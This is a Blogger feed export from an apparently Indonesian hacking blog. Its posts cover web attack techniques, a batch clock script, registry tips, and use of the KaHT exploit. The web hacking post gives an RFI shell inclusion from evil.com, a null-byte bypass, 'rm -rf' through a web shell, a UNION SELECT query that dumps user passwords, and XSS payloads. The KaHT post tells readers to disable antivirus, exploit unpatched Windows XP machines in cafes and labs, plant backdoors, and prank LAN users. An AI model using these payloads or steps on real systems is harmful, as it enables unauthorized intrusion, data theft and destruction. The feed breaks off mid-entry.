<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8591117055296439835</id><updated>2011-04-21T12:23:44.076-07:00</updated><category term='Money maker'/><category term='Hacking'/><category term='Internet'/><category term='Blog'/><category term='Tips dan trik komputer'/><title type='text'>Aneuk Lhox's Blog</title><subtitle type='html'>"ThePiratesAceh Community"</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>27</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-4942266076591509891</id><published>2008-03-31T20:30:00.000-07:00</published><updated>2008-03-31T20:32:29.182-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Web Hacking</title><content type='html'>&lt;p&gt;Things to 
know:&lt;br /&gt;&lt;br /&gt;=- Vulnerability : a security hole that can be exploited to change the way the webapp / software works / functions.&lt;br /&gt;&lt;br /&gt;=- CMSs and forums use databases to store info like users, posts, threads, messages and so on; it's usually / mostly a MySQL server.&lt;br /&gt;&lt;br /&gt;=- RFI [ Remote File Inclusion ] : a malicious user can include 'bad' code to be executed on the vulnerable site.&lt;br /&gt;&lt;br /&gt;=- LFI [ Local File Inclusion ] : a malicious user can open any file on the server.&lt;br /&gt;&lt;br /&gt;=- SQL Injection : injecting a MySQL query to bypass or get more info from a database.&lt;br /&gt;&lt;br /&gt;=- XSS [ Cross Site Scripting ] : if it is a permanent vulnerability, where the user's input is saved, the user can log cookies, IPs, and much more...&lt;br /&gt;&lt;br /&gt;=- Exploit : a script made to maliciously use a vulnerability.&lt;br /&gt;&lt;br /&gt;We are going to take each vulnerability and take a look at what the web developer got wrong that made the script vulnerable...&lt;br /&gt;&lt;br /&gt;=- RFI ::&lt;br /&gt;&lt;br /&gt;RFIs are exploited by including 'bad' code from another site into the infected site; for example, you can include a PHP shell and execute commands on the server using it...&lt;br /&gt;&lt;br /&gt;this vulnerability is very dangerous; a site infected with it can be compromised easily...&lt;br /&gt;&lt;br /&gt;an example of code infected with an RFI:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;as you can see, we are taking the variable page and including it. now that script will work great and do what it's supposed to do, for example:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.example.com/index.dmz?page=contact.dmz" target="_blank"&gt;www.example.com/index.dmz?page=contact.dmz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;this would open contact.dmz, BUT, what would a malicious user do?&lt;br /&gt;&lt;br /&gt;&lt;a 
href="http://www.example.com/index.dmz?page=http://www.evil.com/shell.txt?" target="_blank"&gt;http://www.example.com/index.dmz?pag...com/shell.txt?&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;the shell code must be in a txt file, because this way the code will be parsed / executed on the vulnerable site.&lt;br /&gt;&lt;br /&gt;what happens then?&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;that text file gets included, so let's say the shell.txt had the following code:&lt;br /&gt;&lt;br /&gt;&lt;input name="'cmd'" type="'text'"&gt; &lt;input name="'submit'" value="'Go!'" type="'submit'"&gt; ";  ?&gt;&lt;br /&gt;&lt;br /&gt;a small text box would appear on the page, with a button that would execute commands... the user can compromise the full site using this simple text box; if he had enough privs, he can do the following:&lt;br /&gt;&lt;br /&gt;rm -rf&lt;br /&gt;&lt;br /&gt;and delete your files...&lt;br /&gt;&lt;br /&gt;some devs think they can fix the vulnerability by doing the following:&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;this way, you can only include .php files, and that is not really a big deal because PHP gets parsed on the server side...&lt;br /&gt;&lt;br /&gt;but that won't stop some people: there is something called a null byte, which simply tells PHP to ignore anything after it... if someone wanted to exploit that code, he would do:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.darkmindz.com/index.dmz?page=http://www.evil.com/shell.txt?" 
target="_blank"&gt;http://www.darkmindz.com/index.dmz?p.../shell.txt?&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;as you can see, the [  ] is the null byte, which would get parsed this way:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;so the question now is how to completely secure this URL system?!&lt;br /&gt;&lt;br /&gt;well, you can use a switch statement, and this way anything other than what is already stated won't be included.. ex:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;that is a perfect system, simple, secure, and works &lt;img class="inlineimg" title="Smile" alt="" src="http://thepiratesaceh.blogspot.com/basic%20hacking.php_files/smile.gif" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;now that is done. RFI is just like LFI, nothing is different except the fact that LFI only gets pages from the server. most of the time download scripts are infected with LFI, because they are made to readfile(); whatever it was lol.. which is just bad coding...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now moving to SQL injections, those are deadly when e-commerce sites are infected with them!!&lt;br /&gt;&lt;br /&gt;a malicious user would exploit infected code by bypassing a login form and logging in as admin.&lt;br /&gt;&lt;br /&gt;or by injecting the URL so he can execute MySQL queries, which would let him gain access to users' info, and so on ...&lt;br /&gt;&lt;br /&gt;example of vulnerable code:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;now, as you can see, it takes the 'id' variable and queries it, with no filters at all!!!&lt;br /&gt;&lt;br /&gt;now if i wanted to inject it, i would first check for the  vulnerability.... 
by doing the following:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.example.com/page.php?id=1" target="_blank"&gt;www.example.com/page.php?id=1&lt;/a&gt; OR 2&lt;br /&gt;&lt;br /&gt;IF 2 news items were there, then I'm lucky &lt;img class="inlineimg" title="Big Grin" alt="" src="http://thepiratesaceh.blogspot.com/basic%20hacking.php_files/biggrin.gif" border="0" /&gt;, and here comes the good part, where the information gets extracted: using a UNION command, i can select from another column and echo it there...&lt;br /&gt;&lt;br /&gt;so an injection would be:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.example.com/page.php?id=1" target="_blank"&gt;www.example.com/page.php?id=1&lt;/a&gt; OR 2 UNION SELECT  name,1,password,email FROM users&lt;br /&gt;&lt;br /&gt;this would echo the passwords to the page. now depending on the number of rows in the news column, i will need to change the number of rows selected...&lt;br /&gt;&lt;br /&gt;so now we know what went wrong, let's secure it!!&lt;br /&gt;&lt;br /&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;that is it, this code is secure...&lt;br /&gt;&lt;br /&gt;now moving to XSS, it is not really a big issue UNLESS it is permanent!&lt;br /&gt;&lt;br /&gt;examples of permanent XSS would be in a guestbook, comments, contact forms, mailing lists, etc...&lt;br /&gt;&lt;br /&gt;what can the malicious user do?&lt;br /&gt;&lt;br /&gt;well, he can use javascript to change titles, forms, prices, hidden data, pages, actions, and even worse, log the page!&lt;br /&gt;some CMSs and forums use cookies and store the users' info in them; if that site was vulnerable to XSS, the attacker can gain admin privs by logging the admin cookies...&lt;br /&gt;&lt;br /&gt;a vulnerable code would be:&lt;br /&gt;&lt;br /&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;br /&gt;";  echo $message; }  echo " &lt;form method="'post'" 
name="'message_box'"&gt; &lt;input name="'message'" type="'text'"&gt; &lt;input name="'submit'" type="'submit'"&gt; &lt;/form&gt;";  ?&gt;&lt;br /&gt;&lt;br /&gt;ok, so now a malicious user could do the following:&lt;br /&gt;&lt;br /&gt;submit the following  text to test for vulnerability :&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;script&gt;alert("xss")&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;h1&gt;Nice Website!&lt;/h1&gt;&lt;br /&gt;&lt;br /&gt;IF the HTML gets parsed "and it will in this code" , the attacker will now move to the next step, which is logging the page.. by redirecting it to a logger..&lt;br /&gt;&lt;br /&gt;some methods of bypassing some filters, for example, if the form  only submits links, lets take this one as an example:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;";  echo "&lt;a href="http://thepiratesaceh.blogspot.com/%27$message%27"&gt;Link&lt;/a&gt;";; }  echo " &lt;form method="'post'" name="'message_box'"&gt; &lt;input name="'message'" type="'text'"&gt; &lt;input name="'submit'" type="'submit'"&gt; &lt;/form&gt;";  ?&gt;&lt;br /&gt;&lt;br /&gt;now that should not parse anything, but simply wrap it in a link  right?&lt;br /&gt;&lt;br /&gt;well, i don't think so, you can simply bypass it using:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;'&gt; &lt;script&gt;alert("owned")&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;why does that bypass it?!&lt;br /&gt;&lt;br /&gt;here is what happens, the   Code:&lt;br /&gt;'&gt;&lt;br /&gt;&lt;br /&gt;will stop the a tag, and then you can open anything else...&lt;br /&gt;&lt;br /&gt;here is the  result:&lt;br /&gt;&lt;br /&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;br /&gt;&lt;a href="http://thepiratesaceh.blogspot.com/%27%27"&gt; &lt;script&gt;alert("owned")&lt;/script&gt;'&gt;Link&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;as you can see, the a tag got closed, which allowed me to open another tag,  
which is a script here. and it works&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Well, we are done now &lt;img class="inlineimg" title="Smile" alt="" src="http://thepiratesaceh.blogspot.com/basic%20hacking.php_files/smile.gif" border="0" /&gt;, I hope you enjoyed this tutorial and learned something new from it... questions?</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/4942266076591509891/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=4942266076591509891' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4942266076591509891'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4942266076591509891'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/web-hacking.html' title='Web Hacking'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-3823005997829286308</id><published>2008-03-29T11:55:00.000-07:00</published><updated>2008-03-31T20:19:25.953-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>CMD Tips and Tricks: Making JAMcmd</title><content type='html'>&lt;p&gt;Hola….., wow.. 
surely lots of you have been missing me (or maybe not at all) and can't wait to see another cool tutorial (huh.. someone's full of himself..). OK, let's get straight to the point, but first I want to tell a little story about how this crazy idea came about.&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Here's the story………………….. one pitch-dark night I was climbing a veeery tall watermelon tree.. when suddenly I was startled by something truly terrifying. A figure with black hair and glasses came up to me and wow.. it turned out to be a beautiful woman. I was mesmerized as she bathed in the river and I planned to steal her clothes.. but just as I was about to take them, something foiled that crazy mission.. my mom doused me with a gallon of water and I woke up.. oh well, there goes the story.. but no worries, there are still stories that make even less sense and even crazier ideas, in the next tutorials of course..&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Let's not linger any longer on the silly story above, because it only makes you more confused and unfocused.. Back to the title: Making JAMcmd, which surely confuses you even more, what on earth is that ??.. 
I don't really know how to explain this jamCMD either, so let's just look at the code to understand it….&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;span id="more-8"&gt;&lt;/span&gt;&lt;br /&gt;&lt;strong&gt;HERE is THE CODE&lt;/strong&gt;&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;strong&gt;(&lt;/strong&gt;tested on Windows XP sp 2&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;———————- start ————————-&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;@echo off&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;start /b "%comspec%"&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;:update&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;set _time=%time:~0,8%&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;title Time : [ %_time% ] @ [ %date% ]&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;ping localhost -n 2 -w 500 &gt;nul&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;goto update&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;———————– end ————————–&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Huh, that's it? The story is 
longer than the code.. what a crazy idea&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Save it with the .bat extension&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Example: JamCMD.bat&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Copy it to the Windows directory (c:\windows) so that it can be called from the RUN menu&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;START –&gt; RUN, then just type jamcmd…&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Oh, and if you want to compile it into an .exe you can also use QuickBatchFileCompiler, download it at&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Link : &lt;a href="http://www.abyssmedia.com/quickbfc"&gt;http://www.abyssmedia.com/quickbfc&lt;/a&gt;&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Now on to the explanation section..&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Hmmm..&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;But it seems no different from the regular cmd..&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;..hey, wait a moment, look again: the window title reads “Time : [7:01:53] @ [ 30 Jul 07 ]”&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;That's the difference: the window title shows the time and date, always kept up to date..&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; 
line-height: normal;"&gt;b). Code Explanation&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;1. echo off – used so that commands do not display a message when they run (applies to the commands after/below echo off).&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;2. Start – runs a program (%comspec% is cmd, so we are running cmd).&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;3. @ - same as echo off, but only for the command that follows it.&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;4. :update – gives the script a label named update, used for looping.&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;5. Set – displays, sets, or removes the value of a variable (this time we use the variable “_time”).&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;6. Title – changes the Command Prompt window title.&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;7. Ping – really meant for internet connectivity, but we use it as a trick to stand in for a 1-second pause (cmd has no command for pausing).&lt;/p&gt; 
&lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;8. Goto – loops/repeats/jumps back to the label “update”&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;That's all for the explanation; if anything is still unclear, just ask in the PemrogramanLain forum.. ok&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/3823005997829286308/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=3823005997829286308' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/3823005997829286308'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/3823005997829286308'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/tips-trik-cmd-membuat-jamcmd.html' title='Tips-Trik CMD : Membuat JAMcmd'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' 
src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7524929008431601261</id><published>2008-03-29T11:51:00.002-07:00</published><updated>2008-03-29T11:54:03.968-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Registry Tutorial: Modifying the New Context Menu</title><content type='html'>&lt;p align="left"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:78%;"  &gt;(context menu = the menu that appears when we right-click)&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p align="left"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;If you right-click on the desktop and choose New, you will see many submenus for creating various documents, for example MS Word, Text Document, Corel Draw, and others. The more applications are installed, the longer this row of submenus becomes.&lt;/span&gt;&lt;/p&gt; &lt;p align="left"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;You can modify the document submenus to your liking, for example by removing the submenu of a document type you rarely open/create. 
You can also add one if it is not yet in the submenu. The steps for removing a submenu are as follows:&lt;/span&gt;&lt;/p&gt; &lt;ol&gt;&lt;li&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;Run the registry editor.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;From the Edit menu, click Find.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;Type ShellNew, click OK.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;After that you can delete the ShellNew subkey that the registry editor found.&lt;/span&gt; &lt;/li&gt;&lt;/ol&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7524929008431601261/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7524929008431601261' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7524929008431601261'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7524929008431601261'/><link rel='alternate' type='text/html' 
href='http://enaq.blogspot.com/2008/03/tutorial-registry-memodifikasi-content.html' title='Tutorial Registry: memodifikasi content menu new'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-2766920410737891040</id><published>2008-03-29T11:51:00.000-07:00</published><updated>2008-03-29T11:52:55.345-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Registry Tutorial:</title><content type='html'>&lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica, sans-serif;font-size:78%;"&gt;(context menu = the menu that appears when we right-click)&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;If you right-click on the desktop and choose New, you will see many submenus for creating various documents, for example MS Word, Text Document, Corel Draw, and others. 
The more applications are installed, the longer this row of submenus becomes.&lt;/span&gt;&lt;/p&gt; &lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;You can modify the document submenus to your liking, for example by removing the submenu of a document type you rarely open/create. You can also add one if it is not yet in the submenu. The steps for removing a submenu are as follows:&lt;/span&gt;&lt;/p&gt; &lt;ol&gt;&lt;li&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Run the registry editor.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;From the Edit menu, click Find.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Type ShellNew, click OK.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;After that you can delete the ShellNew subkey that the registry editor found.&lt;/span&gt; &lt;/li&gt;&lt;/ol&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/2766920410737891040/comments/default' title='Poskan 
Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=2766920410737891040' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2766920410737891040'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2766920410737891040'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/tutorial-registry.html' title='Tutorial Registry:'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-6183828786692910467</id><published>2008-03-29T09:14:00.001-07:00</published><updated>2008-03-31T20:21:00.587-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Getting Admin Access on Windows XP</title><content type='html'>Sometimes in an internet cafe, a lab, or even a boarding house that runs Windows XP, users are given only a guest or limited account. We can't burn a CD or install a program, because the account is not an admin. That gets annoying sometimes: you can't do anything, can't burn CDs, can't run programs, it's all very restricted :(...&lt;br /&gt;&lt;p&gt;&lt;br /&gt;I want to share a tip on how to get admin access by taking advantage of a weakness in Windows XP. The experts probably already know this tip, but not everyone is an expert ;p... I just want to share some knowledge, in case it's useful. 
But the author takes no responsibility if anyone uses this for irresponsible purposes; this tutorial is just for fun, heh...&lt;br /&gt;&lt;br /&gt;What do you need?&lt;br /&gt;1. A computer??&lt;br /&gt;2. Luck, because this only works on WinXP that hasn't been updated (or that is still vulnerable and reachable)&lt;br /&gt;3. Money, for snacks and the internet cafe (or, if you want, you could hack the billing and not need money... but you might get caught)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As a first step you need the exploit program &lt;a href="http://www.securityfocus.com/data/vulnerabilities/exploits/KaHT_public.tar.gz"&gt;KaHT  &lt;/a&gt;written by Kralor. KaHT can scan several hosts, find which ones are vulnerable, and run the exploit on the vulnerable hosts. If the link doesn't work, try Googling it, there are plenty, or if you still can't find it just email me! Once you have it, run cmd via Run (Start &gt; Run &gt; cmd). Before that, don't forget to disable the antivirus, because kaht is detected as a trojan. Suppose the kaht program is on drive C, in the folder kaht; the command is then as follows:&lt;br /&gt; &lt;/p&gt;&lt;p&gt;C:\kaht&gt;kaht 127.0.0.0 127.0.0.1  &lt;/p&gt;&lt;p&gt; --&gt; this means scan IPs from 127.0.0.0 to 127.0.0.1 (127.0.0.1 is the loopback IP, so kaht scans the computer itself)&lt;br /&gt;&lt;br /&gt;It can also scan a particular network, for example&lt;br /&gt;&lt;br /&gt;kaht  192.168.0.0 192.168.0.100&lt;br /&gt;&lt;br /&gt;If it succeeds, you'll get admin access..  &lt;/p&gt;&lt;p&gt;C:\Windows\system32&gt;  &lt;/p&gt;&lt;p&gt;try checking the IP (ipconfig): is this our computer ???&lt;br /&gt;&lt;br /&gt;TaRaa....  yup, 'Admin Under Control' hehe... you've got admin access :D&lt;br /&gt;Once you're here you can do anything through that computer. 
Burn CDs, look through files 'protected' by the admin (there might be some interesting ones), create a user with admin access, or make a backdoor so that the user has admin access at login.... Or you can prank your friends on the same network (LAN), or cheat while playing network games... hehe.. fun, right!!&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/6183828786692910467/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=6183828786692910467' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6183828786692910467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6183828786692910467'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/mendapatkan-akses-admin-di-windows-xp.html' title='Mendapatkan Akses Admin di Windows XP'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-8723958196394939485</id><published>2008-03-29T09:03:00.000-07:00</published><updated>2008-03-31T20:22:08.524-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Restoring the Windows XP Boot Manager</title><content 
